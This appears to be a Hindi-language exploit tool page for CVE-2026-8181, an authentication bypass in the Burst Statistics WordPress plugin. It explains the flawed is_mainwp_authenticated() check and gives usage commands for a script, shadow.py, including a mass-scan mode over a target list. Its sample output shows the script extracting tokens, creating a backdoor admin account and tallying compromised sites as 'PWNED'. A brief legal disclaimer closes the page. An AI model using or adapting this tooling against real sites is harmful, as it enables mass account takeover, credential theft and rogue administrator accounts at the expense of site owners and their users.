
CVE-2026-8181 | Burst Statistics 3.4.0 - 3.4.1.1 - Authentication Bypass to Admin Account Takeover
Burst Statistics | प्रमाणीकरण बाईपास से व्यवस्थापक खाता अधिग्रहण
Burst Statistics 3.4.0 - 3.4.1.1 - प्रमाणीकरण बाईपास से व्यवस्थापक खाता अधिग्रहण
बर्स्ट स्टैटिस्टिक्स – प्राइवेसी-फ्रेंडली वर्डप्रेस एनालिटिक्स (गूगल एनालिटिक्स विकल्प) प्लगइन वर्डप्रेस के लिए संस्करण 3.4.0 से 3.4.1.1 में प्रमाणीकरण बाईपास के लिए संवेदनशील है। यह is_mainwp_authenticated() फंक्शन में ऑथराइजेशन हेडर से एप्लीकेशन पासवर्ड को मान्य करते समय गलत रिटर्न-वैल्यू हैंडलिंग के कारण होता है। फंक्शन wp_authenticate_application_password(null, $username, $password) को कॉल करता है जो null (न कि WP_Error) लौटाता है जब लक्ष्य उपयोगकर्ता के पास कोई एप्लीकेशन पासवर्ड कॉन्फ़िगर नहीं होता है। चूंकि कोड केवल is_wp_error() की जाँच करता है, यह wp_set_current_user() को कॉल करने के लिए आगे बढ़ता है — जो पूरे अनुरोध के लिए हमलावर को पूर्ण व्यवस्थापक विशेषाधिकार प्रदान करता है।
बाईपास प्लगइन के बूटस्ट्रैप में has_admin_access() के माध्यम से plugins_loaded (प्राथमिकता 9) के दौरान ट्रिगर होता है, जिसका अर्थ है कि उपयोगकर्ता प्रतिरूपण वर्डप्रेस REST API द्वारा किसी भी रूट को डिस्पैच करने से पहले होता है — जो व्यवस्थापक के रूप में सभी WP कोर एंडपॉइंट्स (/wp/v2/users, /wp/v2/users/me, आदि) तक पहुंच की अनुमति देता है।
यह अप्रमाणित हमलावरों के लिए, एक व्यवस्थापक उपयोगकर्ता नाम के ज्ञान के साथ, किसी भी यादृच्छिक बेसिक ऑथेंटिकेशन पासवर्ड की आपूर्ति करके उस व्यवस्थापक का प्रतिरूपण करना संभव बनाता है, जिससे पूर्ण विशेषाधिकार वृद्धि और व्यवस्थापक खाता अधिग्रहण प्राप्त होता है।
~ CVSS स्कोर: 9.8 (गंभीर)
~ CVSS वेक्टर: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
~ प्रभावित संस्करण: 3.4.0 - 3.4.1.1
~ पैच किया गया संस्करण: 3.4.2
एकल लक्ष्य :
python3 shadow.py -u https://target.comज्ञात उपयोगकर्ता नाम के साथ एकल लक्ष्य :
python3 shadow.py -u https://target.com -U adminसामूहिक लक्ष्य :
python3 shadow.py -f targets.txt -t 20इंटरैक्टिव मोड :
python3 shadow.py/burst/v1/mainwp-auth)
╔══════════════════════════════════════════════════════╗
║ 🔥 CVE-2026-8181 Burst Statistics Auth Bypass ║
║ 👩💻 Friska & Shadow | Route Check | Full Fallback ║
║ 🎯 3.4.0-3.4.1.1 | CVSS 9.8 | Triple Output ║
╚══════════════════════════════════════════════════════╝
[*] [HTTP] http://target.com
[+] Burst Statistics version: 3.4.0
[+] Burst mainwp-auth route alive!
[*] Testing 2 user(s): admin, editor
[*] Trying bypass on: admin (id=1)
[+] BYPASS SUCCESS → admin (id=1, admin=True)
[+] Application Password token extracted!
[💀] USER CREATED: shadow / R4nd0mP@ss!
[💀] TAKEOVER VERIFIED via wp-login.php!
[💀] SUCCESS! http://target.com/wp-admin/
⚡ MASS SCAN: 50 targets | 20 threads
────────────────────────────────────────────────────────────
[💀] [1/50] http://target1.com → PWNED!
[💀] [2/50] http://target2.com → PWNED!
[☠️] [3/50] http://target3.com → DEAD
[-] [4/50] http://target4.com → SECURED
[!] [5/50] http://target5.com → PATCHED
────────────────────────────────────────────────────────────
╔══════════════════════════════════╗
║ 📊 SCAN SUMMARY ║
╠══════════════════════════════════╣
║ 💀 PWNED: 12 ║
║ ☠️ DEAD: 8 ║
║ 🔒 SECURED: 5 ║
║ ⚠️ PATCHED: 15 ║
║ ❌ FAILED: 10 ║
╠══════════════════════════════════╣
║ Total: 50 ║
╚══════════════════════════════════╝
[+] 📁 user.txt | token.txt | new-user-and-header.txt
उन प्रणालियों का अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनके परीक्षण की अनुमति नहीं है, अवैध है।